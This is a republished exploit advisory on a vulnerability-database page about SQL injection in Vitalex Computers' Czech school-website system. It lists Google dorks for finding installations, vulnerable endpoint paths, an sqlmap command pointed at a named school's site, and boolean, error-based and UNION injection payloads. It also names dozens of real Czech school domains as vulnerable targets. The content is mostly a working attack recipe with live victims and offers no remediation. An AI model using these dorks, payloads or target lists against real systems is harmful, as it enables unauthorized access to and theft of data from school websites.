Vulners
Lucene search
Vitalex Computers SRO Tvorba Skolnich Webu 1.0 SQL Injection
🗓️ 31 Dec 2018 00:00:00Reported by KingSkrupellosType 
packetstorm🔗 packetstormsecurity.com👁 4821 Views
`############################################################
# Exploit Title : Vitalex Computers SRO Tvorba A!kolnAch webu 1.0 SQL
Injection
# Exploit Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepages : vitalex.cz
# Google Dork 1 : intext:'' Vitalex Computers - Tvorba A!kolnAch webu''
site:cz
# Google Dork 2 : inurl:''/index.php?type=Blog&id='' site:cz
# Google Dork 3 : inurl:''/public/printAction.php?id=''
# Exploit Risk : Medium
# Category : WebApps
# Version Information : 1.0
+ TinyMCE 4.0 - FancyBox2.1.5 - jQuery1.12.2 - jQuery UI1.11.4 -
+ CodeMirror 5.20.2
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity Reference Link : cxsecurity.com/ascii/WLB-2018050236
############################################################
Czech Copyright A(c) 2011 - 2018 | Vitalex Computers s.r.o. -
Tvorba A!kolnAch webu SQL Injection Vulnerability
############################################################
# Admin Panel Login Path : /administrator/
Other Possible Dorks =>
inurl:''/public/printCalendar.php'' site:cz
inurl:''/public/printFood.php'' site:cz
inurl:''/public/script.php'' site:cz
inurl:''/public/setTemplate.php'' site:cz
inurl:''/public/statniSvatky.php'' site:cz
############################################################
# SQL Injection Exploit =>
/public/printCalendar.php?id=[SQL Injection]
/public/printFood.php?id=[SQL Injection]
/public/script.php?id=[SQL Injection]
/public/setTemplate.php?id=[SQL Injection]
/public/statniSvatky.php?id=[SQL Injection]
/index.php?type=Blog&id=[SQL Injection]
/index.php?type=Contact&id=[SQL Injection]
/index.php?type=Post&id=[SQL Injection]
############################################################
[+] SQLMAP Poc :
$ sqlmap -u "https://www.mzszasada.cz/public/printAction.php?id=164" --dbs
[+] Poc SQL Injection :
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=164 AND 1041=1041
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY
or GROUP BY clause (FLOOR) Payload: id=164 AND (SELECT 5925 FROM
(SELECT COUNT(*),CONCAT(0x7162627171,
(SELECT (ELT(5925=5925,1))),0x7176627a71,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: UNION query
Title: Generic UNION query (NULL) - 14 columns
Payload: id=164 UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627171,
0x52657268506d6d4d63484273527351744e435a5774704c7277517179536a466372
49687765704a58,0x7176627a71),NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL-- zEWq
########################################################################################
# Example Vulnerable Sites =>
# zsodolenavoda.cz/public/printAction.php?id=235%27 => [ Proof of Concept
] => archive.is/vTVbe
Error => You have an error in your SQL syntax; check the manual that
corresponds
to your MySQL server version for the right syntax to use near ''' at line 1
# skolahotelnictvi.cz/public/printAction.php?id=235%27 => [ Proof of
Concept ] => archive.is/gHcSO
Error => You have an error in your SQL syntax; check the manual that
corresponds
to your MySQL server version for the right syntax to use near ''' at line 1
# spss-mel.cz/public/printAction.php?id=235%27 => [ Proof of Concept ] =>
archive.is/Phhwq
Error => You have an error in your SQL syntax; check the manual that
corresponds
to your MySQL server version for the right syntax to use near ''' at line 1
zas-me.cz/public/printCalendar.php?actions=1
gspsd.cz/public/printCalendar.php?actions=1
zusbenesov.cz/public/printCalendar.php?actions=2
zsmarsovska.cz/public/printCalendar.php?actions=2
zshortan.cz/public/printCalendar.php?actions=3
zsmspetrohrad.cz/public/printCalendar.php?actions=2
zsmsklecany.cz/public/printCalendar.php?actions=2
1zszatec.cz/public/printCalendar.php?actions=1
skolazrak.cz/public/printCalendar.php?actions=3
3zslouny.cz/public/printCalendar.php?actions=2
1zsjirkov.cz/public/printCalendar.php?actions=3
skolahotelnictvi.cz/public/printCalendar.php?actions=3
zsmsujezd.cz/public/printCalendar.php?actions=3
zsarnultovice.cz/public/printCalendar.php?actions=2
zuszandov.cz/public/printCalendar.php?actions=3
zsmschuchelna.cz/public/printCalendar.php?actions=3
zsprazacka.cz/public/printCalendar.php?actions=2
#######################################################################################
# Discovered By KingSkrupellos from Cyberizm Digital Security Team
#######################################################################################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Dec 2018 00:00Current
0.8Low risk
Vulners AI Score0.8